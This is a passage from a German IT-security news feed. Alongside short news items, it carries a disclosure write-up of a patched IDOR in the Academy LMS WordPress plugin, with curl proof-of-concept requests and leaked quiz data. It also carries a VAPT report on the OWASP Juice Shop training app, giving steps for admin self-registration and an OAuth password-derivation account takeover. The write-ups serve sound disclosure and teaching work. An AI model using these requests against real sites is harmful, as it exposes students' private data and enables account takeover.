<description><![CDATA[Erneut streicht Microsoft eine Funktion aus Outlook, die bisher frei verfügbar war und die jetzt hinter die Bezahlschranke für das Microsoft 365 Copilot-Abonnement wandert. Das passiert nicht zum ersten und mutmaßlich auch nicht zum letzten Mal. Es geht um die „Meeting Insights“. Dies war eine in...]]></description>
<link>https://tsecurity.de/de/3675697/it-nachrichten/aus-kostenlos-wird-kostenpflichtig-microsoft-verschiebt-weitere-outlook-funktion-zu-copilot/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675697/it-nachrichten/aus-kostenlos-wird-kostenpflichtig-microsoft-verschiebt-weitere-outlook-funktion-zu-copilot/</guid>
<pubDate>Fri, 17 Jul 2026 12:16:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><img src="https://www.drwindows.de/news/wp-content/uploads/2025/08/microsoft_365_copilot_app.jpg" class="attachment-single-thumb size-single-thumb wp-post-image" alt="Microsoft 365 Copilot App" decoding="async" fetchpriority="high" srcset="https://www.drwindows.de/news/wp-content/uploads/2025/08/microsoft_365_copilot_app.jpg 720w, https://www.drwindows.de/news/wp-content/uploads/2025/08/microsoft_365_copilot_app-300x150.jpg 300w, https://www.drwindows.de/news/wp-content/uploads/2025/08/microsoft_365_copilot_app-643x322.jpg 643w" sizes="(max-width: 720px) 100vw, 720px"></div>
<p>Erneut streicht Microsoft eine Funktion aus Outlook, die bisher frei verfügbar war und die jetzt hinter die Bezahlschranke für das Microsoft 365 Copilot-Abonnement wandert. Das passiert nicht zum ersten und mutmaßlich auch nicht zum letzten Mal. Es geht um die „Meeting Insights“. Dies war eine intelligente Funktion in Outlook, welche die Vor- und Nachbereitung von […]</p>
<p>Der Beitrag <a href="https://www.drwindows.de/news/aus-kostenlos-wird-kostenpflichtig-microsoft-verschiebt-weitere-outlook-funktion-zu-copilot">Aus kostenlos wird kostenpflichtig: Microsoft verschiebt weitere Outlook-Funktion zu Copilot</a> erschien zuerst auf <a href="https://www.drwindows.de/news">Dr. Windows</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Gratis bei Amazon: 20 Kindle-E-Books mit Spannung und Romantik]]></title>
<description><![CDATA[Das Wochenende steht vor der Tür und Amazon bietet wieder 20 Kindle-E-Books kostenlos an. Neben spannenden Krimis und Liebesromanen warten auch Ratgeber mit Tipps rund ums Essen auf euch.]]></description>
<link>https://tsecurity.de/de/3675573/it-nachrichten/gratis-bei-amazon-20-kindle-e-books-mit-spannung-und-romantik/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675573/it-nachrichten/gratis-bei-amazon-20-kindle-e-books-mit-spannung-und-romantik/</guid>
<pubDate>Fri, 17 Jul 2026 11:18:41 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das Wochenende steht vor der Tür und Amazon bietet wieder 20 Kindle-E-Books kostenlos an. Neben spannenden Krimis und Liebesromanen warten auch Ratgeber mit Tipps rund ums Essen auf euch.]]></content:encoded>
</item>
<item>
<title><![CDATA[Worin Führungskräfte 2027 investieren sollten]]></title>
<description><![CDATA[Weiter nur Geld für KI auszugeben reicht nicht mehr, so die Analysten.Mr. Hatch – shutterstock.com



Nach einem Jahr zurückhaltender Ausgaben erwarten mehr als 80 Prozent der Entscheider von Tech- und Anwenderunternehmen, dass ihre Budgets in den kommenden zwölf Monaten aufgestockt werden. Jeder...]]></description>
<link>https://tsecurity.de/de/3675380/it-security-nachrichten/worin-fuehrungskraefte-2027-investieren-sollten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675380/it-security-nachrichten/worin-fuehrungskraefte-2027-investieren-sollten/</guid>
<pubDate>Fri, 17 Jul 2026 09:39:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/08/shutterstock_2540359215.jpg?quality=50&amp;strip=all&amp;w=1024" alt="KI Invest" class="wp-image-4045883" width="1024" height="643" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Weiter nur Geld für KI auszugeben reicht nicht mehr, so die Analysten.</p></figcaption></figure><p class="imageCredit">Mr. Hatch – shutterstock.com</p></div>



<p class="wp-block-paragraph">Nach einem Jahr zurückhaltender Ausgaben erwarten mehr als 80 Prozent der Entscheider von Tech- und Anwenderunternehmen, dass ihre Budgets in den kommenden zwölf Monaten aufgestockt werden. Jeder Vierte rechnet hierbei sogar mit einem Zuwachs von zehn Prozent oder mehr. Zu diesem Ergebnis kommen die Analysten von Forrester in einer Umfrage im Rahmen ihrer aktuellen <a href="https://www.forrester.com/report/budget-planning-guide-2027-optimism-abounds/RES197871" target="_blank" rel="noreferrer noopener">2027 Budget Planning Guides</a> (kostenlos für Kunden).</p>



<p class="wp-block-paragraph">Grund für den neugewonnen Mut ist, so die Experten, dass die Chefetagen zunehmend Volatilität als festen Bestandteil des Geschäftsumfelds akzeptieren.</p>



<h2 class="wp-block-heading">Keine Ausgaben ohne Plan</h2>



<p class="wp-block-paragraph">Mehr Geld alleine reiche aber nicht, um im Zeitalter von Künstlicher Intelligenz (KI) zu planen, warnt Forrester. Stattdessen verschärfe es lediglich Probleme wie Datensilos, doppelte Arbeit und technische Altlasten.</p>



<p class="wp-block-paragraph">Um das volle Potenzial der KI auszuschöpfen, müssten die Führungskräfte ihre Strategien überdenken und Investitionen in operative Grundlagen, Governance sowie Experimente, die zu greifbaren Ergebnissen führen, priorisieren.</p>



<p class="wp-block-paragraph">Laut Forrester gibt es in diesem Jahr in vielen Bereichen Grund für Optimismus: So rechnen 82 Prozent der Technologie-Entscheider und 91 Prozent der Marketingverantwortlichen damit, dass ihr Budget für 2027 steigt.</p>



<p class="wp-block-paragraph">Auch im Bereich Customer Experience (CX) gehen mehr als die Hälfte der Führungskräfte (55 Prozent) davon aus, dass ihre Ausgaben im kommenden Jahr um fünf Prozent oder mehr steigen. Grundlage der Daten ist eine weltweite Umfrage unter mehr als 2600 Entscheider aus Tech- und Anwenderunternehmen.</p>



<h2 class="wp-block-heading">Mehr Geld für Wissen und Sichtbarkeit</h2>



<p class="wp-block-paragraph">Doch wohin mit dem Geld? Konkret empfehlen die Experten von Forrester unter anderem, in den Bereichen Enterprise-Kontext und Markensichtbarkeit das Budget zu erhöhen. </p>



<p class="wp-block-paragraph">So sollten Unternehmen Informationen so aufbereiten, dass sie maschinenlesbar sind, und einen klar geregelten Unternehmenskontext schaffen, in dem KI-Agenten sicher und zielgerichtet agieren können. Außerdem empfehlen die Analysten, mehr Geld in die Markensichtbarkeit in KI-Antwortmaschinen zu investieren, da diese zunehmend die Kaufentscheidungen von Kunden beeinflussen würden.</p>



<h2 class="wp-block-heading">Kürzen ohne Kahlschlag</h2>



<p class="wp-block-paragraph">Wo Unternehmen wiederum Budget streichen sollen, ist unter anderem beim Kampf gegen Tech-Altlasten. Die Experten empfehlen Firmen, sich auf gezielte Verbesserungen zu konzentrieren, die zu einer höheren Datenqualität und -zugänglichkeit führen oder die Produktivität von Entwicklern oder Agenten steigern.</p>



<p class="wp-block-paragraph">Zusätzlich raten sie, KI-Initiativen zu streichen, denen es an <a href="https://www.computerwoche.de/article/4197202/sap-studie-ki-rechnet-sich-governance-hinkt-hinterher.html" target="_blank">Governance</a>, klar definierten Verantwortlichkeiten, Erfolgskriterien oder einem konkreten Plan für die Skalierung mangelt.</p>



<h2 class="wp-block-heading">Mehr ausprobieren</h2>



<p class="wp-block-paragraph">Ein Bereich zum Experimentieren sind laut Forrester synthetische Daten als Ergänzung zur klassischen Kundenbefragung. Auf diese Weise ließen sich schneller Insights gewinnen, Konzepttests optimieren und klare Leitplanken setzen, wie sich synthetisch gewonnene Erkenntnisse zuverlässig und verantwortungsvoll einsetzen lassen.</p>



<p class="wp-block-paragraph">Darüber hinaus empfehlen sie, KI-Agenten einzusetzen, um Marketing-Abläufe und kundenorientierten Interaktionen zu unterstützen. Unternehmen sollten zusätzlich agentenbasierte Funktionen erproben, die die Content-Produktion, die Zielgruppenbildung, die Markenführung und die Kundeninteraktion verbessern.</p>



<h2 class="wp-block-heading">Richtig investieren, nicht übermäßig viel</h2>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/sharyn-leaver-155319/" target="_blank" rel="noreferrer noopener">Sharyn Leaver</a>, Chief Research Officer bei Forrester, fasst es so zusammen: „Führungskräfte planen nicht mehr mit einer Rückkehr zur Stabilität, sondern für eine Zukunft, in der Volatilität zur Konstante geworden ist“. Sie prognostiziert, dass im Jahr 2027 Unternehmen, die am meisten für KI ausgeben, nicht zwangsläufig Erfolg haben werden. Stattdessen seien es die Firmen, die in die Grundlagen investieren, welche KI erst wirksam machen: vertrauenswürdige Daten, eine solide Governance, organisatorische Bereitschaft sowie die Fähigkeit zur kontinuierlichen Anpassung an den Wandel von Technologie und Kundenverhalten.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How I Found a Cross-Student IDOR in Academy LMS That Leaked Correct Quiz Answers]]></title>
<description><![CDATA[Author: Shikhali Jamalzade GitHub: alisalive LinkedIn: camalzads Type: Independent Security Research | WordPress Plugin CVE ResearchThis is a write-up of a vulnerability I independently discovered in Academy LMS, a WordPress LMS plugin with 2,000+ active installations. The vulnerability allowed a...]]></description>
<link>https://tsecurity.de/de/3675346/hacking/how-i-found-a-cross-student-idor-in-academy-lms-that-leaked-correct-quiz-answers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675346/hacking/how-i-found-a-cross-student-idor-in-academy-lms-that-leaked-correct-quiz-answers/</guid>
<pubDate>Fri, 17 Jul 2026 09:23:36 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*yTFnySBjd6cxjcwiw7Mxpg.png"></figure><h4>Author: <a href="https://medium.com/u/20557ba7487d">Shikhali Jamalzade</a> <br>GitHub: <a href="http://github.com/alisalive">alisalive</a> <br>LinkedIn: <a href="http://linkedin.com/in/camalzads">camalzads</a> <br>Type: Independent Security Research | WordPress Plugin CVE Research</h4><p>This is a write-up of a vulnerability I independently discovered in Academy LMS, a WordPress LMS plugin with 2,000+ active installations. The vulnerability allowed any enrolled student to read another student’s private quiz results and extract the correct answers to quiz questions — before or during an attempt. It was independently confirmed by another researcher, has since been patched, and this write-up is being published after the fix was released.</p><p>Background: Why Academy LMS</p><p>My WordPress plugin research methodology targets plugins in the 500–9,000 active installations range — a zone that tends to receive less security scrutiny than larger plugins while still having enough real-world deployment to matter. For each candidate, I start with passive analysis: reading the changelog for security-related keywords, reviewing the readme, and checking WPScan’s vulnerability history before touching any code.</p><p>Academy LMS caught my attention because its 3.8.1 changelog contained a specific entry: “Fixed — AJAX API vulnerability in the Notes feature.” This is one of the strongest signals I look for. A developer who has already fixed a security issue in one part of a codebase often used the same patterns elsewhere — and those other places sometimes didn’t get fixed at the same time. My hypothesis was simple: if the Notes controller was fixed, what about the Quiz controller?</p><p>This turned out to be exactly the right question.</p><p>Understanding the Architecture</p><p>Academy LMS uses two parallel systems for handling API requests.</p><p>The first is a centralized AJAX handler defined in includes/classes/abstract-ajax-handler.php. Every AJAX action registered through this base class passes through handle_ajax_request(), which enforces nonce validation and capability checks before dispatching to the actual callback. This is a solid design pattern.</p><p>The second system is a collection of REST controllers under includes/api/ and addons/quizzes/api/. Each controller registers its own routes via register_rest_route() and defines its own permission_callback per endpoint. This is where consistency breaks down.</p><p>When I grepped for permission_callback across the entire plugin, the Notes controller showed the correct pattern: every route used array($this, 'permissions_check'), and that function derived the user via get_current_user_id(), never accepting a user identifier from the request. The Notes fix had made this air-tight.</p><p>The Quiz attempts controller told a different story.</p><p>Two routes in addons/quizzes/api/quiz-questions.php used 'permission_callback' =&gt; '__return_true' — meaning no authentication required at all for those endpoints. That was worth noting. But the more serious issue was in addons/quizzes/api/quiz-attempts.php, specifically in the get_student_quiz_attempt_details endpoint.</p><p>The Vulnerability: Two Separate Failure Points</p><p>The get_student_quiz_attempt_details handler had two independent authorization failures that together created a working IDOR.</p><p>Failure point one: the target user was read from the request, not the session.</p><pre>// addons/quizzes/api/quiz-attempts.php, line ~305<br>$student_id = $request-&gt;get_param( 'user_id' );<br>if ( ! $student_id ) {<br>    $student_id = get_current_user_id();<br>}</pre><p>The handler falls back to the session user only if user_id is absent from the request. Any caller who supplies a user_id parameter gets that value used as the target identity. This is the classic IDOR setup: the object being accessed is determined by a client-controlled key.</p><p>Failure point two: the access gate was evaluated against the victim’s context, not the caller’s.</p><pre>// lines ~308-315<br>$is_administrator = current_user_can( 'administrator' );<br>$is_instructor    = \Academy\Helper::is_instructor_of_this_course( $student_id, $course_id );<br>$enrolled         = \Academy\Helper::is_enrolled( $course_id, $student_id );<br>$is_public        = \Academy\Helper::is_public_course( $course_id );</pre><pre>if ( $is_administrator || $is_instructor || $enrolled || $is_public ) {<br>    // returns attempt details<br>}</pre><p>Notice that is_instructor_of_this_course and is_enrolled both receive $student_id — the attacker-controlled value — not get_current_user_id(). So when an attacker supplies a victim's user_id, the gate asks "is the victim enrolled in this course?" rather than "is the caller enrolled in this course?" If the victim is enrolled (which they must be to have a quiz attempt), the gate returns true, and the handler proceeds to fetch and return that victim's data.</p><p>The database query confirmed the full impact:</p><pre>// classes/query.php, get_quiz_attempt_details()<br>"SELECT<br>    attempt_answers.attempt_id,<br>    attempt_answers.user_id,<br>    attempt_answers.is_correct,<br>    attempt_answers.answer as given_answer,<br>    quiz_answers.answer_title as correct_answer,<br>    quiz_answers.answer_content,<br>    quiz_answers.is_correct as is_correct_answer,<br>    quiz_questions.question_title,<br>    quiz_questions.question_type,<br>    ...<br>FROM {$wpdb-&gt;prefix}academy_quiz_attempt_answers as attempt_answers<br>LEFT JOIN {$wpdb-&gt;prefix}academy_quiz_answers as quiz_answers<br>    ON attempt_answers.question_id = quiz_answers.question_id<br>WHERE attempt_answers.attempt_id=%d AND attempt_answers.user_id=%d"</pre><p>The SELECT *-style join pulled answer_title and answer_content from the quiz_answers table — rows that include is_correct=1 entries, meaning the correct answers. The response handed the full set to the caller: every question the victim answered, whether they got it right, and what the correct answer was.</p><p>The same vulnerable function was exposed through two independent entry points. The REST route at /wp-json/academy/v1/quiz_attempts/{id}/get_student_quiz_attempt_details used this logic directly. The AJAX action academy_quizzes/get_student_quiz_attempt_details via /wp-admin/admin-ajax.php used an identical copy of the same handler in addons/quizzes/ajax/frontend.php.</p><p>Both were confirmed exploitable during testing.</p><p>The Contrast with the Fixed Code</p><p>What made this particularly clear-cut was the comparison with the Notes controller. The fix that had been shipped for Notes followed a textbook pattern:</p><pre>// includes/api/notes.php (fixed)<br>public function get_user_notes( $request ) {<br>    $user_id = get_current_user_id();<br>    // ...<br>}</pre><p>No $request-&gt;get_param('user_id'). The user identity is always taken from the authenticated session. The Quiz handler simply never received the same treatment.</p><p>This is a pattern I have seen repeatedly in plugin codebases: a developer identifies and fixes a class of vulnerability in one module, but the fix is not propagated to sibling modules that share the same pattern. The developer who wrote the Notes fix clearly understood the right approach. The Quiz addon was not updated to match.</p><p>Live Proof of Concept</p><p>I reproduced this against a local Docker environment running WordPress with Academy LMS 3.8.2 and the Quizzes addon enabled.</p><p>Actors in the test:</p><ul><li>Attacker: pocsubscriber (user ID 4, Subscriber role), enrolled in a shared course</li><li>Victim: victimstudent (user ID 5, Subscriber role), enrolled in the same course, with a completed quiz attempt containing a seeded correct-answer marker</li></ul><p>The attacker authenticates normally and obtains a valid REST nonce:</p><pre>curl -s -c cj.txt "http://TARGET/wp-login.php" -o /dev/null<br>curl -s -b cj.txt -c cj.txt \<br>  --data-urlencode 'log=pocsubscriber' \<br>  --data-urlencode 'pwd=PASSWORD' \<br>  --data-urlencode 'wp-submit=Log In' \<br>  --data-urlencode 'testcookie=1' \<br>  "http://TARGET/wp-login.php" -o /dev/null</pre><pre>NONCE=$(curl -s -b cj.txt \<br>  "http://TARGET/wp-admin/admin-ajax.php?action=rest-nonce")</pre><p>The attacker then sends a request supplying the victim’s user_id and attempt_id:</p><pre>curl -s -b cj.txt -H "X-WP-Nonce: $NONCE" \<br>  "http://TARGET/wp-json/academy/v1/quiz_attempts/3/get_student_quiz_attempt_details?course_id=32&amp;user_id=5"</pre><p>The response:</p><pre>{<br>  "3": {<br>    "attempt_id": "3",<br>    "user_id": "5",<br>    "is_correct": true,<br>    "given_answer": [],<br>    "correct_answer": [<br>      {<br>        "answer_id": "2",<br>        "quiz_id": "33",<br>        "answer_title": "SECRET_CORRECT_Paris",<br>        "answer_order": "1"<br>      }<br>    ],<br>    "answer_content": "CORRECT_ANSWER_CONTENT",<br>    "question_title": "Capital of France?",<br>    "question_type": "true_false"<br>  }<br>}</pre><p>User ID 4 received user ID 5’s quiz data, including the seeded correct-answer marker SECRET_CORRECT_Paris. The same result was reproduced via the AJAX vector:</p><pre>curl -s -b cj.txt \<br>  --data-urlencode 'action=academy_quizzes/get_student_quiz_attempt_details' \<br>  --data-urlencode 'security=ACADEMY_NONCE' \<br>  --data-urlencode 'course_id=32' \<br>  --data-urlencode 'attempt_id=3' \<br>  --data-urlencode 'user_id=5' \<br>  "http://TARGET/wp-admin/admin-ajax.php"</pre><p>Response: "success": true, same data.</p><p>Impact Assessment</p><p>The impact has two distinct dimensions.</p><p>The first is a straightforward confidentiality breach. Any enrolled student could enumerate other students’ quiz attempts by iterating over sequential attempt_id and user_id integers — both auto-increment, both trivially guessable. For every attempt they could retrieve the submitted answers, whether each answer was correct, and the final score. In an educational context, this is a meaningful privacy violation: a student's quiz performance is personal data.</p><p>The second dimension is academic integrity. The correct_answer field in the response exposes the correct answers to every quiz question, regardless of whether the requester has even started the quiz. A student could query this endpoint before beginning an attempt, extract the answer key, and complete the quiz with full knowledge of all correct answers. Every graded assessment built on the Academy LMS Quizzes addon was affected.</p><p>The required access level was Subscriber — the lowest authenticated role in WordPress. Any user who could create an account and enroll in a course could exploit this. In the free edition, is_public_course() always returns false due to an unregistered hook, so the practical attack surface was authenticated cross-student access within any shared course. This is the normal LMS use case: multiple students in the same course.</p><p>CVSS 3.1 score: 6.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N).</p><p>Disclosure Timeline</p><p>Discovery and full proof-of-concept (both vectors confirmed): 2026–07–02</p><p>Vendor notified via email to contact@kodezen.com with full technical description, affected code locations, and suggested remediation: 2026–07–02</p><p>Submitted to WPScan vulnerability database with CVE request: 2026–07–02</p><p>WPScan confirmed the vulnerability was already being tracked (independent discovery, duplicate submission): 2026–07–02</p><p>Fix confirmed in latest version by code review (all $request-&gt;get_param('user_id') references replaced with get_current_user_id() throughout quiz-attempts.php): 2026-07-10</p><p>Write-up published: 2026–07–10</p><p>The Fix</p><p>The vendor addressed the vulnerability by replacing all attacker-controlled user identity references with session-derived values. In the current version of addons/quizzes/api/quiz-attempts.php:</p><pre>// Before (vulnerable):<br>$student_id = $request-&gt;get_param( 'user_id' );<br>if ( ! $student_id ) {<br>    $student_id = get_current_user_id();<br>}</pre><pre>// After (fixed):<br>$current_user_id = get_current_user_id();</pre><p>The access gate now evaluates is_enrolled and is_instructor_of_this_course against the authenticated caller, not a request-supplied identity. The fix was applied consistently across both the REST and AJAX entry points. If you are running Academy LMS with the Quizzes addon, update to the latest version.</p><p>What This Teaches</p><p>A few things stood out during this research that are worth naming explicitly.</p><p>The inconsistent-fix pattern is real and worth hunting deliberately. When a plugin ships a security fix in one module, the most productive next step is to find every module that uses the same pattern and check whether it was updated. In this case, the Notes controller and the Quiz controller shared the same conceptual flaw. The fix applied to Notes in 3.8.1 was not carried through to the Quiz addon. This is not negligence — it is a natural consequence of how security fixes get written. A developer identifies a specific bug, fixes that specific bug, and moves on. The audit that would catch the sibling issue requires a broader view.</p><p>The access gate placement matters as much as the access gate logic. The permission_callback on the REST route only checked whether the caller was logged in and associated with the course in a general sense. It did not check whether the object being requested (the specific attempt) belonged to the caller. Object-level authorization — checking not just “can this user access this resource type” but “can this user access this specific resource instance” — needs to happen at the data retrieval layer, not just at the route entry point. This is the core of what OWASP calls Broken Object-Level Authorization (BOLA), the top item in the OWASP API Security Top 10.</p><p>Sequential integer identifiers make IDOR exploitable at scale. When attempt_id and user_id are both auto-increment database integers, an attacker does not need to know specific values to enumerate the data. They iterate. Opaque identifiers (UUIDs, non-sequential tokens) raise the bar, but they are not a substitute for proper authorization — they only make enumeration harder, not impossible if an attacker has access to any valid identifier. The fix here was correct: enforce ownership at the query layer regardless of identifier type.</p><p><em>If you found this useful, feel free to connect on</em> <a href="https://linkedin.com/in/camalzads"><em>LinkedIn</em></a> <em>or check out my projects on</em> <a href="http://github.com/alisalive"><em>GitHub</em></a><em>.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=c68bfe06f3a0" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/how-i-found-a-cross-student-idor-in-academy-lms-that-leaked-correct-quiz-answers-c68bfe06f3a0">How I Found a Cross-Student IDOR in Academy LMS That Leaked Correct Quiz Answers</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tomorrowland 2026 im Live-Stream: Hier könnt ihr die Übertragung sehen und hören]]></title>
<description><![CDATA[Das Warten ist vorbei. Heute startet das Tomorrowland-Festival 2026. Auch in diesem Jahr können alle Musik-Fans, die zuhause geblieben sind, zahlreiche Acts vom Tomorrowland im Live-Stream verfolgen. Das geht kostenlos direkt über die Webseite des Festivals sowie den offiziellen YouTube-Kanal.]]></description>
<link>https://tsecurity.de/de/3675332/it-nachrichten/tomorrowland-2026-im-live-stream-hier-koennt-ihr-die-uebertragung-sehen-und-hoeren/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675332/it-nachrichten/tomorrowland-2026-im-live-stream-hier-koennt-ihr-die-uebertragung-sehen-und-hoeren/</guid>
<pubDate>Fri, 17 Jul 2026 09:17:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das Warten ist vorbei. Heute startet das Tomorrowland-Festival 2026. Auch in diesem Jahr können alle Musik-Fans, die zuhause geblieben sind, zahlreiche Acts vom Tomorrowland im Live-Stream verfolgen. Das geht kostenlos direkt über die Webseite des Festivals sowie den offiziellen YouTube-Kanal.]]></content:encoded>
</item>
<item>
<title><![CDATA[VAPT Report Example]]></title>
<description><![CDATA[This report documents multiple security vulnerabilities identified in the OWASP Juice Shop application. Each finding is described in detail, including severity assessment, exploitation steps and remediation guidance.Setup OWASP Juice Shop Locally Using DockerInstall DockerRun:docker pull bkimmini...]]></description>
<link>https://tsecurity.de/de/3675301/hacking/vapt-report-example/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675301/hacking/vapt-report-example/</guid>
<pubDate>Fri, 17 Jul 2026 09:09:42 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This report documents multiple security vulnerabilities identified in the OWASP Juice Shop application. Each finding is described in detail, including severity assessment, exploitation steps and remediation guidance.</p><h3>Setup OWASP Juice Shop Locally Using Docker</h3><h3>Install Docker</h3><p>Run:</p><pre>docker pull bkimminich/juice-shop<br>docker run - rm -p 127.0.0.1:3000:3000 bkimminich/juice-shop</pre><p>Browse to:<br> <a href="http://localhost:3000/">http://localhost:3000</a></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/740/1*mwz1GNdYbcw3HOLUQX1vGA.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*089pKG_zM-T4UOMGPzYjRw.png"></figure><h3>1. Privilege Escalation via User Registration API</h3><h3>Summary (with CWE)</h3><p>The application allows an attacker to self-register an administrator account by directly invoking the user creation API and supplying the role parameter in the request body. Due to missing server-side authorization and role validation, the backend blindly trusts client input. This results in unauthorized privilege escalation, granting full administrative access without authentication or approval.</p><h3>CWE ID</h3><ul><li>CWE-269 — Improper Privilege Management</li><li>CWE-285 — Improper Authorization</li></ul><h3>Severity (CVSS v3.1)</h3><p><strong>CVSS Vector:</strong><br> CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</p><h3>Metrics:</h3><ul><li>Attack Vector: Network</li><li>Attack Complexity: Low</li><li>Privileges Required: None</li><li>User Interaction: None</li><li>Scope: Unchanged</li><li>Confidentiality Impact: High</li><li>Integrity Impact: High</li><li>Availability Impact: High</li></ul><p><strong>CVSS Base Score:</strong> 9.8 (Critical)</p><h3>Description</h3><p>OWASP Juice Shop exposes a user registration API endpoint (/api/Users) that accepts user details in JSON format. The backend fails to enforce role based access control during user creation and allows the client to specify sensitive attributes such as role. An attacker can exploit this flaw by sending a crafted POST request with "role":"admin", resulting in the creation of an administrator account without any authorization checks.</p><p>This vulnerability completely compromises the application, as administrative privileges allow full access to sensitive data and management functions.</p><h3>Steps to Reproduce</h3><ol><li>Send a POST request to: http://localhost:3000/api/Users</li><li>Edit request body and add role parameter: { "role": "admin" }</li><li>Submit the request using Burp Suite.</li><li>The server responds with a successful user creation message.</li><li>Log in using the created credentials.</li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*yEWUogo4-1Uor4o5aDkSyQ.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Tam4-35GCakrERj7NHew5g.png"></figure><h3>Suggested Remediation</h3><ul><li>Enforce server-side role control</li><li>Default role assignment</li><li>Allow admin role assignment only through authenticated admin workflows</li><li>Validate permissions on every sensitive endpoint</li></ul><h3>References</h3><ol><li><a href="https://owasp.org/Top10/A01_2021-Broken_Access_Control/">OWASP Top 10 — Broken Access Control</a></li><li><a href="https://cwe.mitre.org/data/definitions/269.html">CWE-269: Improper Privilege Management</a></li><li><a href="https://cwe.mitre.org/data/definitions/285.html">CWE-285: Improper Authorization</a></li><li><a href="https://owasp.org/www-project-juice-shop/">OWASP Juice Shop Project</a></li></ol><h3>2. OAuth Account Takeover</h3><h3>Summary (with CWE)</h3><p>OWASP Juice Shop implements Google OAuth login in an insecure manner by deterministically generating user passwords on the client side. The password is derived by reversing the user’s email address and Base64-encoding it, which can be easily reproduced by an attacker.</p><p>This design flaw allows an attacker to log in directly using email/password authentication for an OAuth-registered user, resulting in full account takeover without cracking hashes or bypassing authentication controls.</p><h3>CWE ID</h3><ul><li>CWE-522 — Insufficiently Protected Credentials</li><li>CWE-287 — Improper Authentication</li><li>CWE-284 — Improper Access Control</li></ul><h3>Severity (CVSS v3.1)</h3><p><strong>CVSS Vector:</strong><br> CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N</p><h3>Metrics</h3><ul><li>Attack Vector: Network</li><li>Attack Complexity: Low</li><li>Privileges Required: None</li><li>User Interaction: None</li><li>Scope: Unchanged</li><li>Confidentiality Impact: High</li><li>Integrity Impact: High</li><li>Availability Impact: None</li></ul><p><strong>CVSS Base Score:</strong> 9.1 (Critical)</p><h3>Description</h3><p>OWASP Juice Shop allows users to register and log in via Google OAuth. During this process, the application uses a client-side JavaScript function userService.oauthLogin() found in main.js.</p><p>The OAuth workflow internally calls:</p><ul><li>userService.save() (user creation)</li><li>userService.login() (standard login)</li></ul><p>Both functions set the user password using the following logic:</p><pre>password = btoa(n.email.split("").reverse().join(""))</pre><h3>Password Generation Logic</h3><ul><li>The email address is reversed.</li><li>The reversed string is Base64-encoded.</li><li>The result is used as the account password.</li></ul><h3>Steps to Reproduce:</h3><h4>Identify OAuth Password Logic</h4><ul><li>Open main.js</li><li>Search for oauthLogin</li><li>Locate: password: btoa(n.email.split("").reverse().join(""))</li></ul><h4>Derive Victim Password</h4><p>Email: bjoern@gmail.com<br> Reversed: moc.liamg@nreojb<br> Base64 encoded password:</p><pre>bW9jLmxpYW1nQGhjaW5pbW1pay5ucmVvamI=</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/948/1*vCdCuyVKLSiLH_hhpgCIGA.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ICsFhQCtxrXuosRiVJRgOQ.png"></figure><h3>Suggested Remediation</h3><ul><li>Never generate passwords client-side</li><li>Separate OAuth and password authentication</li><li>Use strong, random credentials</li><li>Do not expose authentication logic</li><li>Perform security design reviews</li></ul><h3>References</h3><ol><li><a href="https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/">OWASP Top 10 — Broken Authentication</a></li><li><a href="https://cwe.mitre.org/data/definitions/522.html">CWE-522 — Insufficiently Protected Credentials</a></li><li><a href="https://datatracker.ietf.org/doc/html/rfc8252">OAuth 2.0 Security Best Practices (RFC 8252)</a></li><li><a href="https://owasp.org/www-project-juice-shop/">OWASP Juice Shop Project</a></li></ol><h3>3. SQL Injection in Product Search Endpoint</h3><h3>Summary (with CWE)</h3><p>An SQL Injection (SQLi) vulnerability was identified in the product search functionality of OWASP Juice Shop. The application fails to properly sanitize user-controlled input in the q parameter, allowing attackers to inject malicious SQL queries.</p><p>This flaw enables unauthorized database access, including enumeration of database tables and potential exposure of sensitive data.</p><h3>CWE ID</h3><p>CWE-89 — Improper Neutralization of Special Elements used in an 